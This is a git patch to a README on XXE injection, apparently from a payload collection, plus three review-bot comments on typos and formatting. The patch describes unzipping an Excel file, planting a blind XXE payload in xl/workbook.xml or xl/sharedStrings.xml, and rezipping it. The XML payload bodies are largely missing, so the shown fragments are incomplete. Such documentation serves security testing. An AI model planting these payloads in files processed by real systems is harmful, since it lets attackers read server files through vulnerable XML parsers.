From 7733d4495e2dcc4180225197ef143c5b3fde2d3d Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 8 Dec 2020 09:50:30 +0100 Subject: [PATCH] add another example of XXE in XLSX --- XXE Injection/README.md | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 44fd88d..9ff9ba9 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -462,7 +462,7 @@ GIF (experimental) Extract the excel file. -```powershell +``` $ mkdir XXE && cd XXE $ unzip ../XXE.xlsx Archive: ../XXE.xlsx @@ -479,16 +479,24 @@ Archive: ../XXE.xlsx Add your blind XXE payload inside `xl/workbook.xml`. -```powershell +```xml ]> &xxe; ``` +Alternativly, add your payload in `xl/sharedStrings.xml`: + +```xml + + ]> +&xxe;testA2testA3testA4testA5testB1testB2testB3testB4testB5 +``` + Rebuild the Excel file. -```powershell +``` $ zip -r ../poc.xlsx * updating: [Content_Types].xml (deflated 71%) updating: _rels/ (stored 0%) 
@@ -539,6 +547,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) * [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau * [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10) * [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) * [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon * [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
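Review bot: In the first hunk (`@@ -462,7 +462,7 @@`) the `powershell` tag on the unzip session is dropped rather than replaced, so the fence ends up untyped; since the block is a `$`-prompted Unix session (`mkdir`, `unzip`), tagging it `bash` or `console` would keep syntax highlighting and still fix the wrong language. The `zip -r` fence in the second hunk gets the same `-```powershell` / `+``` ` treatment, so whichever tag is chosen should be applied to both.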
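Review bot: `Alternativly` in the new sentence of the second hunk (`@@ -479,16 +479,24 @@`) should read `Alternatively`. The new `xl/sharedStrings.xml` example is also collapsed onto a single line (`&xxe;testA2testA3 … testB5`), which hides which shared-string entry carries the `&xxe;` reference; laying it out with one entry per line, as the surrounding XML blocks do, would make the placement obvious. Since the preceding context only describes `xl/workbook.xml` as the blind-XXE location, a sentence on when to choose `sharedStrings.xml` instead (which of the two files the consuming library actually parses) would help; the `excel-reader-xlsx #10` issue added to the references in the same patch appears to be the source for this variant, so citing it next to the example would tie the two together.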
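Review bot: The reference added in the third hunk (`@@ -539,6 +547,7 @@`), `* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10)`, is the only entry in the list with no descriptive title, date or author; the neighbouring entries follow a `Title - Date - Author` pattern, so a short description of what the issue shows (presumably the `sharedStrings.xml` variant introduced earlier in this patch) and its date would keep the list consistent and let readers see why it is cited.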